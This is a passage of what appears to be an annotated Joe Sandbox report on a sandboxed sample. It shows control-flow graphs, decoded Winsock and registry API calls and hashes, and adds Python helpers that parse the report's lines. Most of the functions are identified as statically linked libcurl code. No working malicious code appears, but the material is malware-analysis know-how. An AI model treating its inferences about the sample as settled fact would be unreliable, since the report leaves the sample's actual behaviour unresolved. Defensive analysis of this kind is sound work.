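                 ("SOL_SOCKET", 0x0008): "SO_KEEPALIVE"}


def _as_int(arg):
    """Joe Sandbox prints numeric arguments as exactly 8 hex digits; '?' is unknown."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_key_rights(mask):
    """Turn a samDesired mask into symbolic names, keeping unknown bits visible."""
    if mask == KEY_READ:
        return "KEY_READ"
    names = [name for bit, name in KEY_RIGHTS if mask & bit]
    leftover = mask & ~sum(bit for bit, _ in KEY_RIGHTS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"


def decode_args(api, args):
    """Decode the leading formal parameters of the APIs seen in this report."""
    notes = []
    if api.startswith("RegOpenKeyEx") and len(args) >= 4:
        hive = _as_int(args[0])
        if hive in HIVES:
            notes.append(f"hKey={HIVES[hive]}")
        if args[1] != "?":
            notes.append(f"lpSubKey={args[1]}")
        sam = _as_int(args[3])
        if sam is not None:
            notes.append(f"samDesired={decode_key_rights(sam)}")
    elif api.startswith("RegQueryValueEx") and len(args) >= 6:
        if args[1] != "?":
            notes.append(f"lpValueName={args[1]}")
        data, cb = _as_int(args[4]), _as_int(args[5])
        # lpData=NULL with *lpcbData=0 is the first half of the two-call
        # pattern: probe the size, allocate, then query again for the data.
        if data == 0 and cb == 0:
            notes.append("size probe (lpData=NULL, cbData=0)")
        elif cb is not None:
            notes.append(f"cbData={cb} bytes")
    elif api == "setsockopt" and len(args) >= 3:
        level, opt = _as_int(args[1]), _as_int(args[2])
        lname = SOCKOPT_LEVELS.get(level, "?" if level is None else f"0x{level:X}")
        oname = SOCKOPT_NAMES.get((lname, opt), "?" if opt is None else f"0x{opt:X}")
        notes += [f"level={lname}", f"optname={oname}"]
    return notes


def parse_call(line):
    """Parse one 'APIs' line; returns None for lines that are not API calls."""
    m = _CALL_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    api = m.group("api")
    return {"api": api, "module": m.group("module"), "ref": int(m.group("ref"), 16),
            "args": args, "decoded": decode_args(api, args)}


def summarize(lines):
    """One readable line per API call; undecoded calls keep their raw arguments."""
    out = []
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        detail = ", ".join(call["decoded"]) or ", ".join(call["args"])
        out.append(f"{call['ref']:08X} {call['api']} ({call['module']}): {detail}")
    return out


if __name__ == "__main__":
    for entry in summarize(SAMPLE_LINES):
        print(entry)
```

Run it over the APIs section of any function entry; for this sample the registry lines collapse to the handful of keys a resolver normally reads, which is the list to compare against when checking whether a function does anything beyond ordinary DNS configuration discovery. Value names that happen to be exactly eight hex characters would be misread as numbers, and arguments containing commas are not handled, since the report lines above contain neither.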

                                                     Control-flow Graph
                                                     • Rendered as an image in the original report (executed and not-executed basic blocks colour-coded); entry block 00D88B50, basic blocks span 00D88B50-00D88F06, imported calls connect, SleepEx
                                                    APIs
                                                    • connect.WS2_32(?,?,00000001), ref: 00D88C30
                                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 00D88CF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Sleepconnect
                                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                    • API String ID: 238548546-879669977
                                                    • Opcode ID: 3fe0c8749aade0f546b2a1919fad80907dbba2fb55b766d430c93cc66ae4ceb7
                                                    • Instruction ID: 7df49e8b3d57a58087feea5205b14c2dba1322bcc7e161f55a1acc5facdaf177
                                                    • Opcode Fuzzy Hash: 3fe0c8749aade0f546b2a1919fad80907dbba2fb55b766d430c93cc66ae4ceb7
                                                    • Instruction Fuzzy Hash: 7BB1BE70604306AFDB10EF24C885BA6B7E4AF85318F58852DE8998B292DB71EC54D772

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph and its executed/not-executed colouring are not preserved)
                                                     • d52f17-d52f8c: entry; calls 1235d30, 1236120; -> d531c9
                                                     • d531c9-d531cd: outer loop head; -> d52f91 or -> d531d3
                                                     • d52f91-d52ff4: call d51619; RegOpenKeyExA; -> d531c5 (-> d531c9, next outer iteration) or -> d52ffa (-> d5315c)
                                                     • d5315c-d531ac: RegEnumKeyExA, inner loop head; -> d53010 or -> d531b2 (-> d531c5 -> d531c9)
                                                     • d53010-d53083: call d51619; RegOpenKeyExA; -> d5314e (-> d5315c, next subkey) or -> d53089
                                                     • d53089-d530d4: RegQueryValueExA; -> d530d6 or -> d5313b
                                                     • d530d6-d53137: calls 1236000, 1236090, 1236120, 1235f30, 1236120, 1234490; -> d5313b
                                                     • d5313b-d5314b: RegCloseKey; -> d5314e -> d5315c
                                                     • d531d3-d531d6: exit
                                                     Shape: an outer loop opens a key with RegOpenKeyExA and enumerates its subkeys with RegEnumKeyExA; each subkey is opened with RegOpenKeyExA, one value is read with RegQueryValueExA and handed to the routines at 1236000-1234490, and the handle is closed with RegCloseKey before the next subkey. Neither the key names nor the value name are recovered in this record.
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: EnumOpen
                                                    • String ID: d
                                                    • API String ID: 3231578192-2564639436
                                                    • Opcode ID: 2437102195dfee9d89c45b9612a62d7c0282bec1fdaae92fadcc5e3aab247522
                                                    • Instruction ID: ac751b7e1c66c92e11cebf99d5d1292dede658f286321b4d06db146300a9cc48
                                                    • Opcode Fuzzy Hash: 2437102195dfee9d89c45b9612a62d7c0282bec1fdaae92fadcc5e3aab247522
                                                    • Instruction Fuzzy Hash: 4C71C2B490430A9FDB14DF69C58479EBBF0FF84318F10896DE89897314E7749A888F92
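The graph for the registry-walking function above is delivered by the report as a single `control_flow_graph` token line (decimal node id, hex address range, `call <addr>`, bare API name, `src->dst` edge). The parser below is an added example for this page, not Joe Sandbox tooling: it embeds that raw line verbatim as its sample input, rebuilds blocks and edges, lists API call sites in address order and recovers the natural loops, so the RegEnumKeyExA loop and the APIs executed inside it fall out mechanically instead of being read off a picture. The token grammar is inferred from the report's own data, and taking the lowest address as the function entry is an assumption.

```python
"""Parse a Joe Sandbox `control_flow_graph` line into blocks, edges, API sites and loops.

Added example for this report page, not Joe Sandbox code. Token grammar inferred from the
report's graph data; CFG_TEXT is the graph line of the registry-walking function at d52f17.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Graph data copied verbatim from the report (function at d52f17).
CFG_TEXT = (
    "control_flow_graph 1459 d52f17-d52f8c call 1235d30 call 1236120 "
    "1464 d531c9-d531cd 1459->1464 1465 d52f91-d52ff4 call d51619 RegOpenKeyExA "
    "1464->1465 1466 d531d3-d531d6 1464->1466 1469 d531c5 1465->1469 "
    "1470 d52ffa-d5300b 1465->1470 1469->1464 1471 d5315c-d531ac RegEnumKeyExA "
    "1470->1471 1472 d53010-d53083 call d51619 RegOpenKeyExA 1471->1472 "
    "1473 d531b2-d531c2 1471->1473 1477 d5314e-d53152 1472->1477 "
    "1478 d53089-d530d4 RegQueryValueExA 1472->1478 1473->1469 1477->1471 "
    "1479 d530d6-d53137 call 1236000 call 1236090 call 1236120 call 1235f30 "
    "call 1236120 call 1234490 1478->1479 1480 d5313b-d5314b RegCloseKey "
    "1478->1480 1479->1480 1480->1477"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    calls: List[int] = field(default_factory=list)  # intra-binary call targets
    apis: List[str] = field(default_factory=list)   # imported APIs named on the node


def parse_cfg(text: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Tokenise one graph line into {node_id: Block} and a list of (src, dst) edges."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit():
            # A decimal node id is always followed by its hex range ("lo-hi" or a single address).
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)
            cur = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[cur.node_id] = cur
            i += 2
        elif tok == "call":
            if cur is None:
                raise ValueError("call before any node")
            cur.calls.append(int(tokens[i + 1], 16))  # target may be all digits: consume it blindly
            i += 2
        else:
            if cur is None:
                raise ValueError("API name before any node")
            cur.apis.append(tok)
            i += 1
    return blocks, edges


def api_sites(blocks: Dict[int, Block]) -> List[Tuple[str, int]]:
    """(API, block start address) pairs in address order."""
    return sorted(((a, b.start) for b in blocks.values() for a in b.apis), key=lambda s: s[1])


def back_edges(blocks, edges, entry):
    """Edges into a block still on the DFS stack, i.e. loop back edges as (tail, head)."""
    nodes = set(blocks) | {x for e in edges for x in e}
    succ = {n: [] for n in nodes}
    for s, d in edges:
        succ[s].append(d)
    colour = {n: 0 for n in nodes}  # 0 unvisited, 1 on stack, 2 finished
    found = []

    def dfs(n):
        colour[n] = 1
        for d in succ[n]:
            if colour[d] == 1:
                found.append((n, d))
            elif colour[d] == 0:
                dfs(d)
        colour[n] = 2

    dfs(entry)
    return found


def natural_loops(blocks, edges):
    """Map loop-head start address -> sorted APIs called anywhere inside that loop."""
    preds = {n: [] for n in set(blocks) | {x for e in edges for x in e}}
    for s, d in edges:
        preds[d].append(s)
    entry = min(blocks, key=lambda n: blocks[n].start)  # assumption: lowest address is the entry
    loops = {}
    for tail, head in back_edges(blocks, edges, entry):
        body, work = {head, tail}, [tail]
        while work:  # walk predecessors back to the head: the natural loop of this back edge
            n = work.pop()
            for p in preds[n]:
                if p not in body:
                    body.add(p)
                    work.append(p)
        apis = loops.setdefault(blocks[head].start, set())
        apis.update(a for n in body if n in blocks for a in blocks[n].apis)
    return {h: sorted(a) for h, a in loops.items()}


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    for api, addr in api_sites(blocks):
        print(f"{addr:08x} {api}")
    for head, apis in natural_loops(blocks, edges).items():
        print(f"loop @ {head:08x}: {', '.join(apis)}")
```

Run stand-alone it prints the API sites and, for each loop head, the APIs inside that loop; on the sample both heads (d531c9 and d5315c) contain the open/enumerate/query/close quartet, which is the registry-walk signature an analyst pivots on when checking which keys the sample reads.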

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d89290-d892ed: entry; call d576a0 (the send wrapper listed below); -> d892f3 or -> d893c3
                                                     • d892f3-d892fb: -> d89301 or -> d893aa
                                                     • d89301-d89333: calls d6d8c0, d6d9a0; -> d89335 or -> d893a7
                                                     • d89335-d89364: WSAIoctl; -> d89366 or -> d8939b
                                                     • d89366-d8936f: -> d89371 or -> d8939b
                                                     • d89371-d89390: setsockopt; -> d8939b or -> d89392 (-> d8939b)
                                                     • d8939b-d893a4: -> d893a7 -> d893aa
                                                     • d893aa-d893af: -> d893b5 or -> d89456
                                                     • d893b5-d893bc: -> d89429 or -> d893be (-> d89456)
                                                     • d893c3-d893ce: -> d893d0 or -> d893e5
                                                     • d893d0-d893e1: -> d893b5 or -> d893e3 (-> d89456)
                                                     • d893e5-d89427: calls d6d090, d94f40; -> d89456 or -> d89429
                                                     • d89429-d89431: -> d89439 or -> d89433
                                                     • d89433-d89437: -> d89456 or -> d89439
                                                     • d89439-d8943f: -> d89456 or -> d89441
                                                     • d89441-d89453: call d950a0; -> d89456
                                                     • d89456-d89470: exit
                                                     Shape: after the send wrapper at d576a0 returns, one path queries the socket with WSAIoctl and, behind a check at d89366, applies the result with setsockopt; the other path goes through d6d090/d94f40. The function's strings (Send failure: %s, send(len=%zu) -> %d, err=%d) are its logging output.
                                                    APIs
                                                     • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00D8935D
                                                     • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00D89389
                                                     • Decoded: 4004747B is SIO_IDEAL_SEND_BACKLOG_QUERY (IOC_OUT, a 4-byte ULONG), and 0000FFFF/00001001 with optlen 00000004 are SOL_SOCKET/SO_SNDBUF. Querying the ideal send backlog and writing it into the send buffer is libcurl's Windows socket tuning in lib/cf-socket.c, which also matches the cf-socket.c string on this function: this routine is statically linked libcurl, not sample-specific socket code, so the behaviour of interest is in its callers.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Ioctlsetsockopt
                                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                    • API String ID: 1903391676-2691795271
                                                    • Opcode ID: c5a1a4a89584210656122dea8d674e91a0bcf2753b48062d03f69e1f6be0b7ed
                                                    • Instruction ID: 68097404b58f7c1d400eaeb86271a694e3a759e1b665fab5538ec62563bd7147
                                                    • Opcode Fuzzy Hash: c5a1a4a89584210656122dea8d674e91a0bcf2753b48062d03f69e1f6be0b7ed
                                                    • Instruction Fuzzy Hash: 0C51E571A04305AFDB14EF24C895FBAB7A5FF85314F188529FD888B282E730E951C7A1
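The argument values in the API lines above are raw hex, and decoding them is the first thing a reviewer does with such a record. The decoder below is an added example for this page, not Joe Sandbox or libcurl code: it parses the report's `name.MODULE(args), ref: addr` line format (the three sample lines are copied from this report, the WSAStartup one from the record further down), splits a WSAIoctl control code into its IOC direction, family, group and number fields rather than matching whole values, and names setsockopt levels and options and the WSAStartup version. Constant values are those of winsock2.h and mstcpip.h; the name tables deliberately cover only codes named here, so anything else is reported as unknown with its decoded fields.

```python
"""Decode the raw hex Winsock arguments shown in the report's API lines.

Added example for this report page, not Joe Sandbox or libcurl code. API lines are copied
from the report; constant encodings come from winsock2.h / mstcpip.h (IOC_* bits, the
_IOR/_IOW/_WSAIO* macros, SOL_*/SO_* values).
"""
import re
from typing import Any, Dict

# API lines copied from the report (WSAIoctl/setsockopt from d89290, WSAStartup from d6d5e0).
API_LINES = [
    "• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00D8935D",
    "• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00D89389",
    "• WSAStartup.WS2_32(00000202), ref: 00D6D65A",
]

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Winsock ioctl layout: bits 31..29 direction, bits 28..27 family, then either BSD-style
# (size<<16 | group<<8 | number) for IOC_UNIX or a plain 16-bit number for the _WSAIO* macros.
IOC_DIRECTIONS = {0x20000000: "IOC_VOID", 0x40000000: "IOC_OUT",
                  0x80000000: "IOC_IN", 0xC0000000: "IOC_INOUT"}
IOC_FAMILIES = {0x00000000: "IOC_UNIX", 0x08000000: "IOC_WS2",
                0x10000000: "IOC_PROTOCOL", 0x18000000: "IOC_VENDOR"}
IOCPARM_MASK = 0x7F
KNOWN_IOCTLS = {  # (family, group, number) -> name
    ("IOC_UNIX", "t", 123): "SIO_IDEAL_SEND_BACKLOG_QUERY",      # _IOR('t', 123, ULONG)
    ("IOC_UNIX", "f", 126): "FIONBIO",                           # _IOW('f', 126, u_long)
    ("IOC_UNIX", "f", 127): "FIONREAD",                          # _IOR('f', 127, u_long)
    ("IOC_UNIX", "s", 7): "SIOCATMARK",                          # _IOR('s', 7, u_long)
    ("IOC_WS2", None, 6): "SIO_GET_EXTENSION_FUNCTION_POINTER",  # _WSAIORW(IOC_WS2, 6)
    ("IOC_VENDOR", None, 4): "SIO_KEEPALIVE_VALS",               # _WSAIOW(IOC_VENDOR, 4)
}
SOCKOPT_LEVELS = {0xFFFF: "SOL_SOCKET", 0: "IPPROTO_IP", 6: "IPPROTO_TCP", 41: "IPPROTO_IPV6"}
SOCKOPTS = {
    ("SOL_SOCKET", 0x0004): "SO_REUSEADDR", ("SOL_SOCKET", 0x0008): "SO_KEEPALIVE",
    ("SOL_SOCKET", 0x1001): "SO_SNDBUF", ("SOL_SOCKET", 0x1002): "SO_RCVBUF",
    ("SOL_SOCKET", 0x1005): "SO_SNDTIMEO", ("SOL_SOCKET", 0x1006): "SO_RCVTIMEO",
    ("IPPROTO_TCP", 0x0001): "TCP_NODELAY",
}


def _arg(tok: str) -> Any:
    tok = tok.strip()
    if tok == "?":
        return None   # the sandbox could not recover this argument
    try:
        return int(tok, 16)
    except ValueError:
        return tok    # the report sometimes shows the string an argument pointed at


def parse_api_line(line: str) -> Dict[str, Any]:
    """Split one report API line into api, module, argument list and call-site address."""
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def decode_ioctl(code: int) -> Dict[str, Any]:
    """Break a Winsock ioctl control code into its encoded fields and name it if known."""
    direction = IOC_DIRECTIONS.get(code & 0xE0000000, "?")
    family = IOC_FAMILIES[code & 0x18000000]
    if family == "IOC_UNIX":
        size, group, number = (code >> 16) & IOCPARM_MASK, chr((code >> 8) & 0xFF), code & 0xFF
    else:
        size, group, number = 0, None, code & 0xFFFF
    return {"direction": direction, "family": family, "size": size, "group": group,
            "number": number, "name": KNOWN_IOCTLS.get((family, group, number))}


def annotate(line: str) -> Dict[str, Any]:
    """Parse one API line and attach symbolic names for the arguments that are constants."""
    call = parse_api_line(line)
    api, args = call["api"], call["args"]
    decoded: Dict[str, Any] = {}
    if api == "WSAIoctl" and len(args) > 1 and isinstance(args[1], int):
        d = decode_ioctl(args[1])
        decoded["dwIoControlCode"] = d["name"] or f"unknown {d['direction']} {d['family']} #{d['number']}"
    elif api == "setsockopt" and len(args) > 2 and isinstance(args[1], int) and isinstance(args[2], int):
        level = SOCKOPT_LEVELS.get(args[1], f"level {args[1]:#x}")
        decoded["level"] = level
        decoded["optname"] = SOCKOPTS.get((level, args[2]), f"option {args[2]:#x}")
        if len(args) > 4 and isinstance(args[4], int):
            decoded["optlen"] = args[4]
    elif api == "WSAStartup" and args and isinstance(args[0], int):
        decoded["wVersionRequested"] = f"{args[0] & 0xFF}.{args[0] >> 8}"  # MAKEWORD(major, minor)
    call["decoded"] = decoded
    return call


if __name__ == "__main__":
    for ln in API_LINES:
        r = annotate(ln)
        print(f"{r['ref']:08X} {r['api']}: {r['decoded']}")
```

On this record it yields SIO_IDEAL_SEND_BACKLOG_QUERY (IOC_OUT, 4-byte ULONG) for the WSAIoctl and SOL_SOCKET/SO_SNDBUF with optlen 4 for the setsockopt, that is, the socket's ideal send backlog is queried and written straight into SO_SNDBUF; the WSAStartup line decodes to Winsock 2.2.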

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d576a0-d576be: entry; -> d576e6 or -> d576c0
                                                     • d576c0-d576c7: -> d576e6 or -> d576c9
                                                     • d576c9-d576d1: -> d576d3 or -> d5770b
                                                     • d576d3-d576e4: -> d576f4
                                                     • d576e6-d576f2: send; -> d576f4 or -> d5775e
                                                     • d576f4-d57709: call d572a0; -> d5775e
                                                     • d5770b-d57759: calls d572a0, d5cb20, 10d8c50; -> d5775e
                                                     • d5775e-d57762: exit
                                                     Shape: a thin wrapper around send(). Checks on entry can divert into d5770b-d57759, which never reaches the send call site (the LIMIT %s:%d %s reached memlimit path); otherwise send() is called and the result is logged through d572a0, which both paths share (the SEND %s:%d send(%lu) = %ld path).
                                                    APIs
                                                     • send.WS2_32(multi.c,?,?,?,00D53D4E,00000000,?,?,00D607BF), ref: 00D576EB
                                                     • Note: the format strings on this function (LIMIT %s:%d %s reached memlimit, SEND %s:%d send(%lu) = %ld) are those of libcurl's memory-debug wrappers in lib/memdebug.c, which are only compiled in with CURLDEBUG; d576a0 is therefore curl_dbg_send, a logging shim around send(), and the multi.c value among the arguments is consistent with the source-file string these wrappers take for their log line. The recv and socket wrappers at d57770 and d575e0 below carry the matching RECV and FD strings. Sample-specific network behaviour lives in the callers of these shims, not in the shims themselves.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                    • API String ID: 2809346765-3388739168
                                                    • Opcode ID: 68bf0c4a883cb7657e9c67ef5a3e4bb6de77dbd7ac15fe0c88d8349df5f7cf1d
                                                    • Instruction ID: f7bc9ab91301727cdca9c72aafe5375d03b68049d4a2586dcba148740f95ddc3
                                                    • Opcode Fuzzy Hash: 68bf0c4a883cb7657e9c67ef5a3e4bb6de77dbd7ac15fe0c88d8349df5f7cf1d
                                                    • Instruction Fuzzy Hash: 48115CF9A193047BE9209B1ABD8AD2B3B5CDFC6B2EF540D18FC0423315D2619C1487B2

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d57770-d5778e: entry; -> d577b6 or -> d57790
                                                     • d57790-d57797: -> d577b6 or -> d57799
                                                     • d57799-d577a1: -> d577a3 or -> d577db
                                                     • d577a3-d577b4: -> d577c4
                                                     • d577b6-d577c2: recv; -> d577c4 or -> d5782e
                                                     • d577c4-d577d9: call d572a0; -> d5782e
                                                     • d577db-d57829: calls d572a0, d5cb20, 10d8c50; -> d5782e
                                                     • d5782e-d57832: exit
                                                     Shape: the same wrapper layout as the send wrapper at d576a0, here around recv(): entry checks can divert into d577db-d57829 without reaching the recv call site (LIMIT %s:%d %s reached memlimit), otherwise recv() runs and d572a0 logs the result (RECV %s:%d recv(%lu) = %ld).
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: recv
                                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                    • API String ID: 1507349165-640788491
                                                    • Opcode ID: ba9fc7f91e9e4cff7139c8f83f850368e367b2b54d720d53a1c4ecdd1a890773
                                                    • Instruction ID: 2e16b6fcd01555fe38076c83ed5363f4b86577400e6bd8a3082467d15dea2b75
                                                    • Opcode Fuzzy Hash: ba9fc7f91e9e4cff7139c8f83f850368e367b2b54d720d53a1c4ecdd1a890773
                                                    • Instruction Fuzzy Hash: 3F112CF9A193047BE5209B15BC4AE2B7B5CDBC6B6DF18091CFC4863355E261DC1886F2

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d575e0-d575ed: entry; -> d57607 or -> d575ef
                                                     • d575ef-d575f6: -> d57607 or -> d575f8
                                                     • d575f8-d575ff: -> d57601 (-> d57607) or -> d57643
                                                     • d57607-d57629: socket; -> d5763f or -> d5762b
                                                     • d5762b-d5763c: call d572a0; -> d5763f
                                                     • d57643-d57699: calls d572a0, d5cb20, 10d8c50; no recorded successor
                                                     • d5763f-d57642: exit
                                                     Shape: the same wrapper layout as the send and recv wrappers, here around socket(): entry checks can divert into d57643-d57699 without reaching the socket call site (LIMIT %s:%d %s reached memlimit), otherwise socket() runs and d572a0 logs the descriptor (FD %s:%d socket() = %d).
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                    • API String ID: 98920635-842387772
                                                    • Opcode ID: 6955866960438f6e982f5c206af15625480ff37d5aabadd19c0f4d02a06899b5
                                                    • Instruction ID: 4d53fb8735021a0a35fa43bb1883e6c080061af1e4797272da1645262c0194b5
                                                    • Opcode Fuzzy Hash: 6955866960438f6e982f5c206af15625480ff37d5aabadd19c0f4d02a06899b5
                                                    • Instruction Fuzzy Hash: AD114CB5A1531177DA20566D7C46F8B3B48DF8272EF140914FC54933A2D3218C68C3F2

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d8a150-d8a159: entry; -> d8a15f or -> d8a250
                                                     • d8a15f-d8a17b: -> d8a249 or -> d8a181
                                                     • d8a181-d8a1ce: getsockname; -> d8a1d0 or -> d8a1f7
                                                     • d8a1d0-d8a1f5: call d6d090 (the getsockname() failed with errno %d: %s string is referenced at d8a1f0); -> d8a240
                                                     • d8a1f7-d8a214: call d8ef30; -> d8a249 or -> d8a216
                                                     • d8a216-d8a23b: call d6d090 (the ssloc inet_ntop() failed with errno %d: %s string is referenced at d8a23b); -> d8a240
                                                     • d8a240-d8a246: call d94f40; -> d8a249
                                                     • d8a249-d8a24f: -> d8a250
                                                     • d8a250: exit
                                                     Shape: getsockname() on the socket, then d8ef30 on the returned address (its failure is reported with the inet_ntop string, so it is the address-to-text conversion); each failure path formats a message through d6d090 and passes it to d94f40.
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 00D8A1C7
                                                    Strings
                                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00D8A23B
                                                    • getsockname() failed with errno %d: %s, xrefs: 00D8A1F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3358416759-2605427207
                                                    • Opcode ID: c11f8030ca9f5d488c702e4768f6761586d40133aedcda6c0702508e8ca4e1bd
                                                    • Instruction ID: 0674b2618b4855adaffc7b054031ae26d9690d65552135b7a5f32729bafe5b6b
                                                    • Opcode Fuzzy Hash: c11f8030ca9f5d488c702e4768f6761586d40133aedcda6c0702508e8ca4e1bd
                                                    • Instruction Fuzzy Hash: 04210A31808680AAF735AB29EC46FE773BCEF91328F041615F98853151FA32598687F2

                                                     Control-flow Graph (basic blocks, internal call targets and API call sites recovered from the report's graph data; the rendered graph is not preserved)
                                                     • d6d5e0-d6d5ee: entry; -> d6d652 or -> d6d5f0
                                                     • d6d652-d6d662: WSAStartup; -> d6d664 or -> d6d670
                                                     • d6d664-d6d66f: no recorded successor
                                                     • d6d670-d6d676: -> d6d5f0 or -> d6d67c
                                                     • d6d67c-d6d68d: no recorded successor
                                                     • d6d5f0-d6d604: call d6d690; -> d6d606 or -> d6d61b
                                                     • d6d606-d6d614: -> d6d61b or -> d6d616 (-> d6d61b)
                                                     • d6d61b-d6d651: call d77620; exit
                                                     Shape: Winsock initialisation. WSAStartup is followed by d6d690 and d77620; the function's strings (iphlpapi.dll, if_nametoindex) are consistent with resolving if_nametoindex from iphlpapi.dll at run time.
                                                    APIs
                                                     • WSAStartup.WS2_32(00000202), ref: 00D6D65A
                                                     • Decoded: 00000202 is MAKEWORD(2,2), a request for Winsock 2.2. Together with the iphlpapi.dll and if_nametoindex strings on this function, this matches libcurl's Windows start-up routine, which initialises Winsock 2.2 and resolves if_nametoindex from iphlpapi.dll at run time, so this is library initialisation rather than sample-specific code.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Startup
                                                    • String ID: if_nametoindex$iphlpapi.dll
                                                    • API String ID: 724789610-3097795196
                                                    • Opcode ID: 431bdf1cc78f379139c0f1ab32b53b57fc0c907ee05679307ccfe5088cc59b61
                                                    • Instruction ID: 61886cfeb7b02324b4b724fad61f2e8616a9d7e16de474c77ed1d925e6a59b55
                                                    • Opcode Fuzzy Hash: 431bdf1cc78f379139c0f1ab32b53b57fc0c907ee05679307ccfe5088cc59b61
                                                    • Instruction Fuzzy Hash: B7017BD0F4134453EB207B7DEC2B36535906B5130CF48146CE848923A2F629C448C373

